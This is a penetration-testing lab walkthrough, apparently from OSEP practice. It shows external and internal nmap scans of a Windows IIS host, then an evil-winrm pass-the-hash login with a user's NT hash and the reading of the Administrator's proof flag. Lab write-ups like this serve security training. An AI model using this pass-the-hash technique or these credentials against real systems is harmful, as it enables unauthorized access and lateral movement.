nmap -sT -Pn -A 192.168.64.169
Nmap scan report for 192.168.64.169
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 2 IP addresses (2 hosts up) scanned in 207.40 seconds
Now scan the same box from the internal side (from web05, all ports):
root@web05:/home# ./run-nmap.sh -Pn -A -p- 172.16.64.254
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-01 06:05 EDT
Nmap scan report for 172.16.64.254
Host is up (0.00026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3128/tcp open http-proxy Squid http proxy 3.5.28
|_http-server-header: squid/3.5.28
|_http-title: ERROR: The requested URL could not be retrieved
**5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)**
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:86:39:F9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 172.16.64.254
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 174.97 seconds
WinRM (5985/tcp) is reachable only on the internal interface, so log in over it from the inside using pete's NT hash (pass-the-hash):
┌──(kali㉿kali)-[~/Documents/osep/tools]
└─$ **evil-winrm -u ops.comply.com\\\\pete -H 6db6cfdf45964a02a80e85a7ab9f4314 -i 172.16.64.254**
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\pete\\Documents> cd c:\\Users\\Administrator\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> more proof.txt
**5d725dccc25c82f36f0d9428096c5b6e**
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.64.169
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.64.254
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> hostname
proxy01
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>